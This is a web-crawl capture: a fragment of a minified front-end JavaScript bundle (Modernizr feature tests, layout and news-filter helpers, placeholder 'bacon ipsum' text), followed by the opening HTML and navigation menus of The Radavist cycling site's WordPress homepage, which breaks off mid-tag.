pork dolor. Ad in esse biltong. Dolore tenderloin exercitation ad pork loin t-bone, dolore in chicken ball tip qui pig. Ut culpa tongue, sint ribeye dolore ex shank voluptate hamburger. Jowl et tempor, boudin pork chop labore ham hock drumstick consectetur tri-tip elit swine meatball chicken ground round. Proident shankle mollit dolore. Shoulder ut duis t-bone quis reprehenderit. Meatloaf dolore minim strip steak, laboris ea aute bacon beef ribs elit shank in veniam drumstick qui. Ex laboris meatball cow tongue pork belly. Ea ball tip reprehenderit pig, sed fatback boudin dolore flank aliquip laboris eu quis. Beef ribs duis beef, cow corned beef adipisicing commodo nisi deserunt exercitation. Cillum dolor t-bone spare ribs, ham hock est sirloin. Brisket irure meatloaf in, boudin pork belly sirloin ball tip. Sirloin sint irure nisi nostrud aliqua. Nostrud nulla aute, enim officia culpa ham hock. Aliqua reprehenderit dolore sunt nostrud sausage, ea boudin pork loin ut t-bone ham tempor. Tri-tip et pancetta drumstick laborum. Ham hock magna do nostrud in proident. Ex ground round fatback, venison non ribeye in.",document.body.insertBefore(e,s),n.cssText="position:absolute;top:0;left:0;width:5em;text-align:justify;text-justification:newspaper;",i=t.offsetHeight,r=t.offsetWidth,n.cssText="position:absolute;top:0;left:0;width:5em;text-align:justify;text-justification:newspaper;"+prefixes.join("hyphens:auto; "),o=t.offsetHeight!=i||t.offsetWidth!=r,document.body.removeChild(e),e.removeChild(t),o}catch(a){return!1}}function i(e,t){try{var n=createElement("div"),i=createElement("span"),r=n.style,o=0,s=!1,a=!1,l=!1,d=document.body.firstElementChild||document.body.firstChild;return r.cssText="position:absolute;top:0;left:0;overflow:visible;width:1.25em;",n.appendChild(i),document.body.insertBefore(n,d),i.innerHTML="mm",o=i.offsetHeight,i.innerHTML="m"+e+"m",a=i.offsetHeight>o,t?(i.innerHTML="m<br />m",o=i.offsetWidth,i.innerHTML="m"+e+"m",l=i.offsetWidth>o):l=!0,a===!0&&l===!0&&(s=!0),document.body.removeChild(n),n.removeChild(i),s}catch(c){return!1}}function r(e){try{var t,n=createElement("input"),i=createElement("div"),r="lebowski",o=!1,s=document.body.firstElementChild||document.body.firstChild;if(i.innerHTML=r+e+r,document.body.insertBefore(i,s),document.body.insertBefore(n,i),n.setSelectionRange?(n.focus(),n.setSelectionRange(0,0)):n.createTextRange&&(t=n.createTextRange(),t.collapse(!0),t.moveEnd("character",0),t.moveStart("character",0),t.select()),window.find)o=window.find(r+r);else try{t=window.self.document.body.createTextRange(),o=t.findText(r+r)}catch(a){o=!1}return document.body.removeChild(i),document.body.removeChild(n),o}catch(a){return!1}}return document.body||document.getElementsByTagName("body")[0]?(addTest("csshyphens",function(){if(!testAllProps("hyphens","auto",!0))return!1;try{return n()}catch(e){return!1}}),addTest("softhyphens",function(){try{return i("&#173;",!0)&&i("&#8203;",!1)}catch(e){return!1}}),void addTest("softhyphensfind",function(){try{return r("&#173;")&&r("&#8203;")}catch(e){return!1}})):void setTimeout(e,t)}var t=300;setTimeout(e,t)}),Modernizr.addTest("cssmask",testAllProps("maskRepeat","repeat-x",!0)),Modernizr.addTest("overflowscrolling",testAllProps("overflowScrolling","touch",!0)),Modernizr.addTest("cssreflections",testAllProps("boxReflect","above",!0)),Modernizr.addTest("cssresize",testAllProps("resize","both",!0)),Modernizr.addTest("shapes",testAllProps("shapeOutside","content-box",!0)),Modernizr.addTest("textalignlast",testAllProps("textAlignLast")),Modernizr.addTest("csstransforms3d",function(){var e=!!testAllProps("perspective","1px",!0),t=Modernizr._config.usePrefixes;if(e&&(!t||"webkitPerspective"in docElement.style)){var n;Modernizr.supports?n="@supports (perspective: 1px)":(n="@media (transform-3d)",t&&(n+=",(-webkit-transform-3d)")),n+="{#modernizr{left:9px;position:absolute;height:5px;margin:0;padding:0;border:0}}",testStyles(n,function(t){e=9===t.offsetLeft&&5===t.offsetHeight})}return e}),Modernizr.addTest("preserve3d",testAllProps("transformStyle","preserve-3d")),Modernizr.addTest("csstransforms",function(){return-1===navigator.userAgent.indexOf("Android 2.")&&testAllProps("transform","scale(1)",!0)}),Modernizr.addTest("csstransitions",testAllProps("transition","all",!0)),Modernizr.addTest("csspseudotransitions",function(){var e=!1;if(!Modernizr.csstransitions||!window.getComputedStyle)return e;var t='#modernizr:before { content:" "; font-size:5px;'+Modernizr._prefixes.join("transition:0s 100s;")+"}#modernizr.trigger:before { font-size:10px; }";return Modernizr.testStyles(t,function(t){window.getComputedStyle(t,":before").getPropertyValue("font-size"),t.className+="trigger",e="5px"===window.getComputedStyle(t,":before").getPropertyValue("font-size")}),e}),Modernizr.addTest("userselect",testAllProps("userSelect","none",!0)),testRunner(),setClasses(classes),delete ModernizrProto.addTest,delete ModernizrProto.addAsyncTest;for(var i=0;i<Modernizr._q.length;i++)Modernizr._q[i]();window.Modernizr=Modernizr}(window,document);var FCH={resize:[],scroll:[],ready:[],load:[],init:function(){this.IE10=this.isIE(10),this.IE9=this.isIE(9),this.anyIE=this.IE10||this.IE9,this.breakpoints(),this.resize.push(this.breakpoints),this.ready.push(this.mobileFPS);for(var e=["resize","scroll","ready","load"],t=0;t<e.length;t++)this._attachChildListeners(e[t]);this._attachListeners()},setDefault:function(e,t){return"undefined"==typeof e?t:e},smoothScroll:function(e,t,n,i){t=this.setDefault(t,2e3),n=this.setDefault(n,100),i=this.setDefault(i,0),setTimeout(function(){$("html,body").animate({scrollTop:e.offset().top+i},t)},n)},localSet:function(e,t){var n=JSON.stringify(t);return localStorage[e]=JSON.stringify(t),n},localGet:function(e){return"undefined"!=typeof localStorage[e]?JSON.parse(localStorage[e]):!1},localClear:function(e){return"undefined"==typeof e?localStorage.clear():localStorage.removeItem(e)},isIE:function(e){var t=new RegExp("msie"+(isNaN(e)?"":"\\s"+e),"i");return t.test(navigator.userAgent)},exists:function(e){return!!document.querySelector(e)},breakpoints:function(){var e,t;e=window.innerWidth,t=window.innerHeight,FCH.dimensions={ww:e,wh:t},FCH.bp={small:768>e,small_up:e>767,medium_portrait:e>767&&960>e,medium:e>960&&1349>e,medium_up:e>960,large:e>1350}},hasClass:function(e,t){return!!e.className.match(new RegExp("(\\s|^)"+t+"(\\s|$)"))},addClass:function(e,t){this.hasClass(e,t)||(e.className=e.className.trim(),e.className+=" "+t)},removeClass:function(e,t){if(this.hasClass(e,t)){var n=new RegExp("(\\s|^)"+t+"(\\s|$)");e.className=e.className.replace(n," ")}},mobileFPS:function(){var e,t=document.getElementsByTagName("body")[0],n=FCH,i=function(){return n.removeClass(t,"u-disable_hover")},r=function(){clearTimeout(e),n.hasClass(t,"u-disable_hover")||n.addClass(t,"u-disable_hover"),e=setTimeout(i,500)};n.scroll.push(r)},_attachChildListeners:function(e){for(var t=Object.keys(FC),n=0;n<t.length;n++){var i=FC[t[n]];if(i.hasOwnProperty(e)){var r=i[e];r.prototype=i,FCH[e].push(r)}}},_callListener:function(e){for(var t=this[e],n=0;n<t.length;n++)t[n].call(t[n].prototype)},_throttle:function(e,t,n){n=n||window;var i=!1,r=function(){i||(i=!0,requestAnimationFrame(function(){n.dispatchEvent(new CustomEvent(t)),i=!1}))};n.addEventListener(e,r)},_attachListeners:function(){var e=this,t="optimized";"function"==typeof CustomEvent?(e._throttle("resize","optimizedresize"),e._throttle("scroll","optimizedscroll")):t="",window.addEventListener(t+"scroll",function(){e._callListener("scroll")}),window.addEventListener(t+"resize",function(){e._callListener("resize")}),document.addEventListener("DOMContentLoaded",function(){e._callListener("ready")}),window.addEventListener("load",function(){e._callListener("load")})}};"undefined"!=typeof jQuery&&(FCH.$body=jQuery("body"),FCH.$window=jQuery(window),FCH.$document=jQuery(document));var FC={init:function(){FC._ui.init(),FC._front_matter.init(),FC._cascade_directory.init(),FC._cascade_index.init(),FC._cookie_buster.init()}};!function(){var e=function(e,t){var n=window.location.hash,i=new RegExp("("+e+"=.*)("+t+",?)"),r=n.match(i);n=n.replace(r[0],r[1]),n=n.replace(/\,\&/g,"&"),n=n.replace(/\,$/,""),n=n.replace(/\=\,/g,"="),window.location.hash=n},t=function(e,t,n){var r,o=window.location.hash,s=i(e);"&"===s.charAt(0)||""===s?(s=e+"=",r=s+t):(s=e+"="+s,r=n?e+"="+t:s+","+t),o=o.replace(s,r),window.location.hash=o},n=function(e){var t=window.location.hash,n=new RegExp("[?&]"+e+"=","g");t=t.replace(n,""),t=t.replace("#&","#?"),window.location.hash=t},i=function(e){if(!window.location.hash)return"";var t=window.location.hash,n=new RegExp("#.*[?&]"+e+"=([^&]+)(&|$)"),i=t.match(n);return i?i[1]:""},r=function(e,t){return"undefined"==typeof e?t:e},o=function(r,o,s,a){var l=window.location.hash;if(-1!==l.indexOf(r)){var d=i(r),c=new RegExp(o,"g");c.test(d)?s?t(r,o,a):(""===o?e(r,d):e(r,o),""===i(r)&&n(r)):t(r,o,a)}else window.location.hash?window.location.hash+="&"+r+"="+o:window.location.hash="?"+r+"="+o};Fryr.prototype={params:{},init:function(e){var t=this,n=function(){var n=t.parse();e.call(this,n)};return window.onhashchange=n,n(),this},update:function(e,t,n){n=r(n,!1),o(e,t,n,!0)},append:function(e,t){o(e,t,!1,!1)},parse:function(){var e,t=window.location.hash;if(this.params={},window.location.hash&&/\?/g.test(t)){e=t.split("?")[1],e=e.split("&");for(var n=0;n<e.length;n++){var i=e[n].split("="),r=i[0],o=i[1];this.params[r]=o}}return this.params},convert:function(e){if(e.constructor===String&&(e=JSON.parse(e)),e.constructor!==Object)return!1;for(var t=Object.keys(e),n="?",i=0;i<t.length;i++){var r=t[i],o=e[t[i]];o.constructor===Array&&(o=o.join(",")),"?"!==n&&(n+="&"),n+=r+"="+o}return n},merge:function(e,t){t=r(t,!1);var n;if(e.constructor===String&&(e=JSON.parse(e)),t)n=this.convert(e);else{for(var i=this.parse(),o=Object.keys(i),s=0;s<o.length;s++){var a=o[s];i[a[s]];e.hasOwnProperty(a)&&(i[a]=e[a])}n=this.convert(i)}return window.location.hash="#"+n,n},param:function(e){return i(e)},paramPresent:function(e){var t=this.params[e];return"undefined"!=typeof t&&""!==t}}}(),FC._ui={init:function(){this.revealFrontMatter(),this.revealContent(),this.chosen(),this.magnific(),this.tweetUrl(),$(".js-opens-modal").click(function(e){e.preventDefault()})},chosen:function(){$("select").chosen({width:"85px"})},magnific:function(){$(".js-opens-modal").magnificPopup({type:"iframe",iframe:{markup:'<div class="mfp-iframe-scaler"><div class="mfp-close"></div><iframe class="mfp-iframe" frameborder="0" allowfullscreen></iframe></div>',patterns:{youtube:{index:"youtube.com/",id:"v=",src:"//www.youtube.com/embed/%id%?autoplay=1&rel=0"}}}})},revealFrontMatter:function(){setTimeout(function(){$(".front_matter").addClass("is-revealed")},25)},revealContent:function(){setTimeout(function(){$(".content").addClass("is-revealed")},300)},tweetUrl:function(){$("article.tweet a").each(function(){var e=$(this).text();$(this).text(e.replace(/^https?:\/\//,""))}),$("a").each(function(){var e=new RegExp("/"+window.location.host+"/");e.test(this.href)||$(this).attr("target","_blank")})}},FC._front_matter={init:function(){this.navToggle(),this.navItem()},resize:function(){this.navItem()},navToggle:function(){var e=$(".front_matter-nav-toggle"),t=$(".front_matter-nav");e.click(function(){t.toggleClass("is-open")})},navItem:function(){var e=$(".front_matter-nav-list li a");e.hover(function(){$(this).parent("li").toggleClass("active")})}},FC._cascade_directory={init:function(){this.cascade_directory_alpha.init(),this.cascade_directory_beta.init()},resize:function(){this.cascade_directory_alpha.init(),this.cascade_directory_beta.init()},cascade_directory_alpha:{$half_article_alpha:$(".cascade_directory.alpha .half_article.alpha"),init:function(){this.chapterHeadingAlpha(),this.halfArticleAlpha(),this.secondHalfArticleBeta(),this.chapterFigureAlpha()},chapterFigureAlpha:function(){function e(){t.eq(0).find("figcaption").css({right:l-i.width()-20}),t.eq(1).find("figcaption").css({right:(t.eq(1).children(".binding").width()-o)/2+o+20}),t.eq(2).find("figcaption").css({left:(t.eq(1).children(".binding").width()-o)/2+o+20})}var t=$(".chapter"),n=t.children("figure"),i=n.children("figcaption"),r=t.find("header"),o=r.outerWidth(),s=r.offset(),a=r.position(),l=s.left;a.left;FCH.bp.medium_up&&FCH.$body.hasClass("home")?e():$(".chapter-figure.alpha figcaption").removeAttr("style")},chapterHeadingAlpha:function(){function e(){$(".chapter-heading.alpha").each(function(){$(this).css({height:t.height()})})}var t=this.$half_article_alpha;FCH.bp.large?e():$(".chapter-heading.alpha").removeAttr("style")},halfArticleAlpha:function(){function e(){t.each(function(){var e=$(this).siblings(".beta, .gamma").eq(0).height(),t=-1*(e+10);$(this).css("marginTop",t)})}var t=this.$half_article_alpha;FCH.bp.large?e():t.removeAttr("style")},secondHalfArticleBeta:function(){function e(){n.each(function(){var e=$(this).siblings().eq(1);e.css({marginTop:e.height()+10})})}function t(){for(var e=-1,t=n.length;t>e;e++){var i=n.eq(e).siblings(".beta, .gamma").eq(1);e%2===0?i.each(function(){$(this).css("right",-1*(i.width()+10))}):i.each(function(){$(this).css("left",-1*(i.width()+10))})}}var n=this.$half_article_alpha;FCH.bp.large?(e(),t()):(n.removeAttr("style"),n.siblings(".beta, .gamma").removeAttr("style"))}},cascade_directory_beta:{$chapterHeading:$(".cascade_directory.beta .chapter-heading"),$chapterContent:$(".cascade_directory.beta .chapter-content"),init:function(){this.chapterHeading(),this.chapterContent()},chapterHeading:function(){function e(){t.each(function(){var e=$(this).siblings(".chapter-content").children(".half_articles").children(".beta:first-of-type, .gamma:first-of-type").height(),t=2*e+10;$(this).css("height",t)}),n.each(function(){var e=$(this).siblings(".chapter-figure");$(this).css("height",e.height())})}var t=$(".cascade_directory.beta .chapter-heading.alpha"),n=$(".cascade_directory.beta .chapter-heading.gamma");FCH.bp.medium_up?e():n.removeAttr("style")},chapterContent:function(){function e(){t.each(function(){var e=$(this).children(".half_articles").children(".beta, .gamma").eq(3);e.css("marginTop",e.height()+10)})}var t=this.$chapterContent;FCH.bp.medium_up?e():t.find(".beta, .gamma").removeAttr("style")}}},FC._cascade_index={init:function(){this.cascade_index_alpha.init()},resize:function(){this.cascade_index_alpha.init()},cascade_index_alpha:{$half_article:$(".cascade_index.alpha .half_article"),init:function(){this.secondHalfArticle()},secondHalfArticle:function(){function e(){second_half_article_margintop=t.eq(0).outerHeight(!0)-t.eq(3).outerHeight(!0)-1,t.eq(1).css("marginTop",second_half_article_margintop)}var t=this.$half_article,n=this.$half_article.eq(1);FCH.bp.medium_up&&FCH.$body.hasClass("portfolios")||FCH.bp.medium_up&&FCH.$body.hasClass("teams")||FCH.dimensions.ww>1200&&FCH.$body.hasClass("news")?e():n.removeAttr("style")}}},FC._cookie_buster={init:function(){this.clear_cookies()},clear_cookies:function(){FCH.$body.hasClass("portfolios")||$.removeCookie("portfolio_params",{path:"/"}),FCH.$body.hasClass("teams")||$.removeCookie("team_params",{path:"/"}),FCH.$body.hasClass("news")||$.removeCookie("news_params",{path:"/"})}},FC._filters={ready:function(){$(".filters").length&&this.select_init()},resize:function(){},scroll:function(){},select_init:function(){if(_this=this,FCH.$body.hasClass("news")){var e=function(e){_this._post_news_request(e)};this.fry=new Fryr(e),this._set_filter_value(this.fry.params),this._select_events()}},_set_filter_value:function(e){var t=Object.keys(e)[0],n=e[t];$(".js-"+t+"-filter option[data-filter='"+n+"']").prop("selected","selected"),$(".js-"+t+"-filter").trigger("chosen:updated")},_post_news_request:function(e){$.ajax({url:"/filter/news",type:"post",data:e,success:function(t){$(".js-results-table").html(t),$.cookie("news_params",JSON.stringify(e)),FC._ui.magnific()}})},_select_events:function(){this._year_select_event(),this._type_select_event()},_year_select_event:function(){var e=this;$(".js-year-filter").on("change",function(){var t=$(this).attr("value"),n=$(".js-year-filter option:selected").attr("data-filter");e._reset_filter_selects($(this)),history.pushState(null,null,"#"),FC._filters.fry.update(t,n,!0)})},_type_select_event:function(){var e=this;$(".js-type-filter").on("change",function(){var t=$(this).attr("value"),n=$(".js-type-filter option:selected").attr("data-filter");e._reset_filter_selects($(this)),history.pushState(null,null,"#"),FC._filters.fry.update(t,n,!0)})},_reset_filter_selects:function(e){$(".js-drop-down").not(e).each(function(){$(this).val($(this).find("option[default]").val()),$(this).trigger("chosen:updated")})}},function(){FCH.ready.push(FC.init),FCH.init()}();
0
<!DOCTYPE html> <html xmlns:fb="https://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#" lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta property="og:title" content="The Radavist | A group of individuals who share a love of cycling and the outdoors." /> <meta property="og:description" content=" “Where would you take your Leatherman FREE?” Leatherman's tools - particularly the Wave - have been staples for us on our travels. From bikepacking or touring, camping, fishing or 4x4 expeditions..." /> <meta property="og:url" content="http://theradavist.com"/> <meta property="og:image" content="https://media.theradavist.com/uploads/2019/05/P2_P4_Jaws.png?resize=1024,720&quality=75" /> <meta property="og:type" content="website" /> <meta property="og:site_name" content="The Radavist"/> <title>The Radavist | A group of individuals who share a love of cycling and the outdoors.</title> <link rel="icon" href="https://theradavist.com/app/themes/radavist/inc/img/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="https://theradavist.com/app/themes/radavist/inc/img/favicon.ico" type="image/x-icon" /> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://theradavist.com/wp/xmlrpc.php"> <!-- Open Graph Meta Tags generated by Blog2Social 530 - https://www.blog2social.com --> <meta property="og:title" content="The Radavist"/> <meta property="og:description" content="A group of individuals who share a love of cycling and the outdoors."/> <meta property="og:url" content="https://theradavist.com"/> <!-- Open Graph Meta Tags generated by Blog2Social 530 - https://www.blog2social.com --> <!-- Twitter Card generated by Blog2Social 530 - https://www.blog2social.com --> <meta name="twitter:card" content="summary"> <meta property="twitter:title" content="The Radavist"/> <meta property="twitter:description" content="A group of individuals who share a love of cycling and the outdoors."/> <!-- Twitter Card generated by Blog2Social 530 - https://www.blog2social.com --> <link rel='dns-prefetch' href='//ajax.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel='dns-prefetch' href='//media.theradavist.com' /> <link rel="alternate" type="application/rss+xml" title="The Radavist &raquo; Feed" href="https://theradavist.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="The Radavist &raquo; Comments Feed" href="https://theradavist.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/theradavist.com\/wp\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://theradavist.com/wp/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='radavist-style-css' href='https://theradavist.com/app/themes/radavist/style.css?ver=1.2.2' type='text/css' media='all' /> <script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js?ver=1.11.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var gadwpUAEventsData = {"options":{"event_tracking":"1","event_downloads":"zip|mp3|mpeg|pdf|doc*|ppt*|xls*|jpeg|png|gif|tiff","event_bouncerate":0,"aff_tracking":0,"event_affiliates":"\/out\/","hash_tracking":0,"root_domain":"theradavist.com","event_timeout":100,"event_precision":0,"event_formsubmit":0,"ga_pagescrolldepth_tracking":0,"ga_with_gtag":0}}; /* ]]> */ </script> <script type='text/javascript' src='https://theradavist.com/app/plugins/google-analytics-dashboard-for-wp/front/js/tracking-analytics-events.js?ver=5.3.8'></script> <link rel='https://api.w.org/' href='https://theradavist.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://theradavist.com/wp/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://theradavist.com/wp/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> </head> <body class="home blog desktop"> <header class="mast" id="master"> <a class="logo" href="https://theradavist.com"><img src="https://theradavist.com/app/themes/radavist/inc/img/radavist.png" /></a> <nav id="primary-nav" class="cf"> <ul class="cf"> <li class="primary-nav-tab" id="radar-tab">RADAR<span></span></li> <li class="primary-nav-tab" id="reportage-tab">REPORTAGE<span></span></li> <li class="primary-nav-tab"><a class="header-menu-item" href="https://theradavist.com/videos">VIDEOS</a></li> <li class="primary-nav-tab" id="about-tab">ABOUT<span></span></li> <li class="primary-nav-tab"><a class="header-menu-item shop" href="https://shop.theradavist.com/collections/all" target="_blank">SHOP</a><span></span></li> </ul> </nav> <nav id="secondary-nav" class="cf"> <ul class="cf"> <li class="mainsearch"> <form role="search" method="get" class="search-form" action="https://theradavist.com/"> <input type="search" class="search-field" value="SEARCH" name="s" /> </form> </li> </ul> </nav> <nav id="social-nav"> <ul class="cf"> <li class="socialfb"><a href="https://www.facebook.com/theradavist" target="_blank">Facebook</a></li> <li class="socialtw"><a href="https://twitter.com/theRadavist" target="_blank">Twitter</a></li> <li class="socialin"><a href="http://instagram.com/theRadavist" target="_blank">Instagram</a></li> <li class="socialtu"><a href="http://theradavist.tumblr.com/" target="_blank">Tumblr</a></li> <li class="socialrss"><a href="https://theradavist.com/feed" target="_blank">RSS</a></li> <!--<li class="socialjackal"><a href="#">Jackal</a></li>--> </ul> </nav> <div class="expanded-menu wide-container cf"> <div id="radar" class="menu-block" style="display:none"> <div class="sub_menu_wrap"> <div class="sub_menu"> <div class="sub_menu_inner"> <!-- <li class="menu-block-nav-tab active-menu-block-item" id="comingsoonradar-tab">Coming Soon</li> <li class="menu-block-nav-tab" id="popularadar-tab">Popular</li> <li class="menu-block-nav-tab" id="trendingradar-tab">Trending</li>--> <li class="menu-block-nav-tab active-menu-block-item" id="eventsradar-tab">Events</li> <li class="menu-block-nav-tab" id="productsradar-tab">Products</li> <li class="menu-block-nav-tab" id="framebuildersradar-tab">Frame Builders</li> <li class="menu-block-nav-tab" id="randomnessradar-tab">Randomness</li> </div> </div> </div> <div class="expanded-blocks cf"> <!--<div id="comingsoon" class="col_wrap cf"> </div> <div id="popular" class="col_wrap cf" style="display:none"> </div> <div id="trending" class="col_wrap cf" style="display:none"> </div>--> <div id="eventsradar" class="col_wrap cf first" style="display:block"> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/the-swift-campout-returns-for-2019/"><img src="https://media.theradavist.com/uploads/2019/05/Screen-Shot-2019-05-02-at-8.15.00-AM.png?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Screen-Shot-2019-05-02-at-8.15.00-AM.png?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/Screen-Shot-2019-05-02-at-8.15.00-AM.png?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/the-swift-campout-returns-for-2019/">The Swift Campout Returns for 2019!</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/tickets-now-available-for-the-second-annual-wtf-bikexplorers-summit/"><img src="https://media.theradavist.com/uploads/2019/05/Copy-of-2018-WTF-Bikexplorers-Check-In-1.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Copy-of-2018-WTF-Bikexplorers-Check-In-1.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/Copy-of-2018-WTF-Bikexplorers-Check-In-1.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/tickets-now-available-for-the-second-annual-wtf-bikexplorers-summit/">Tickets Are Now SOLD OUT! for the Second...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/04/hey-portland-theres-a-trail-work-day-at-stub-stewart-state-park-this-saturday/"><img src="https://media.theradavist.com/uploads/2019/04/PDW_TrailWorkParty_11x17_digital_42419.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/PDW_TrailWorkParty_11x17_digital_42419.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/04/PDW_TrailWorkParty_11x17_digital_42419.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/04/hey-portland-theres-a-trail-work-day-at-stub-stewart-state-park-this-saturday/">Hey Portland! There&rsquo;s a Trail Work Day a...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/04/vancouver-bikepacking-and-touring-swap-meet/"><img src="https://media.theradavist.com/uploads/2019/04/swapmeet-1.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/swapmeet-1.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/04/swapmeet-1.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/04/vancouver-bikepacking-and-touring-swap-meet/">Vancouver Bikepacking and Touring Swap M...</a></div></div></div></div> </div> <div id="productsradar" class="col_wrap cf" style="display:none"> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/velo-orange-nuetrino-minivelo-presale-is-live/"><img src="https://media.theradavist.com/uploads/2019/05/IMGP9701.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/IMGP9701.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/IMGP9701.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/velo-orange-nuetrino-minivelo-presale-is-live/">Velo Orange Nuetrino Minivelo Presale is...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/spray-bikes-new-frame-builders-metal-plating-colors/"><img src="https://media.theradavist.com/uploads/2019/05/spraybikenew.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/spraybikenew.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/spraybikenew.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 600px) 100vw, 600px" /></a> <div class="sub-menu-block-title cf"> <a href="https://theradavist.com/2019/05/spray-bikes-new-frame-builders-metal-plating-colors/">Spray.Bike&rsquo;s New Frame Builder&rsquo;s Metal P...</a></div></div></div></div> <div class="sub_menu_block_wrap"><div class="sub_menu_block"><div class="sub_menu_block_inner"> <a href="https://theradavist.com/2019/05/cascada-all-road-venture-jersey/"><img src="https://media.theradavist.com/uploads/2019/05/venture-jersey-cycling.jpg?resize=600,360&amp;quality=75" class="attachment-thumb-article size-thumb-article wp-post-image" alt="" /></a> <div class="sub-menu-block-title cf"> <a 